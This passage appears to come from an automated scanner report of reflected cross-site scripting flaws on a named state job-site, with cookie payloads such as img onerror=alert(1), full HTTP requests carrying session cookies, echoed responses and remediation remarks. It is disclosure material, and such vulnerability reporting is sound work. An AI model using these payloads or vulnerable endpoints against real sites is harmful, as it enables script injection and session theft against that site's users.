HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:34 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:15:33'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN7E46B";ALERT(1)//47870D01FCB\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9fd5"><img%20src%3da%20onerror%3dalert(1)>df5821943b1 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as e9fd5"><img src=a onerror=alert(1)>df5821943b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/etp/etp_newuser_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=ene9fd5"><img%20src%3da%20onerror%3dalert(1)>df5821943b1; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:23 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:15:22'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ene9fd5"><img src=a onerror=alert(1)>df5821943b1"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 345b0"%3balert(1)//bb034151741 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 345b0";alert(1)//bb034151741 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/leavesite.cfm?title=Career+Readiness&url=http%3A%2F%2Fwww%2Eact%2Eorg%2Fcertificate%2F HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en345b0"%3balert(1)//bb034151741; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:19 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN345B0";ALERT(1)//BB034151741\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dd09"><img%20src%3da%20onerror%3dalert(1)>14180bf8e4f was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 1dd09"><img src=a onerror=alert(1)>14180bf8e4f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/leavesite.cfm?title=Career+Readiness&url=http%3A%2F%2Fwww%2Eact%2Eorg%2Fcertificate%2F HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en1dd09"><img%20src%3da%20onerror%3dalert(1)>14180bf8e4f; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:12 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en1dd09"><img src=a onerror=alert(1)>14180bf8e4f"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8914"><img%20src%3da%20onerror%3dalert(1)>6aee311800c was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as e8914"><img src=a onerror=alert(1)>6aee311800c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/mn_eligibility_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=ene8914"><img%20src%3da%20onerror%3dalert(1)>6aee311800c; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:48 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ene8914"><img src=a onerror=alert(1)>6aee311800c"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 192b5"%3balert(1)//4deb3a09ea1 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 192b5";alert(1)//4deb3a09ea1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/mn_eligibility_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en192b5"%3balert(1)//4deb3a09ea1; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:55 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN192B5";ALERT(1)//4DEB3A09EA1\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58b0b"><img%20src%3da%20onerror%3dalert(1)>574bc68bc7e8202f9 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 58b0b"><img src=a onerror=alert(1)>574bc68bc7e8202f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269 Cache-Control: max-age=0 Origin: https://www.vermontjoblink.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en58b0b"><img%20src%3da%20onerror%3dalert(1)>574bc68bc7e8202f9; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:44 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en58b0b"><img src=a onerror=alert(1)>574bc68bc7e8202f9"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b001"%3balert(1)//6e8624b8e0ae7c17b was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 7b001";alert(1)//6e8624b8e0ae7c17b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269 Cache-Control: max-age=0 Origin: https://www.vermontjoblink.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en7b001"%3balert(1)//6e8624b8e0ae7c17b; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:45 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN7B001";ALERT(1)//6E8624B8E0AE7C17B\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed9d5"><img%20src%3da%20onerror%3dalert(1)>d473d92771b was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as ed9d5"><img src=a onerror=alert(1)>d473d92771b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
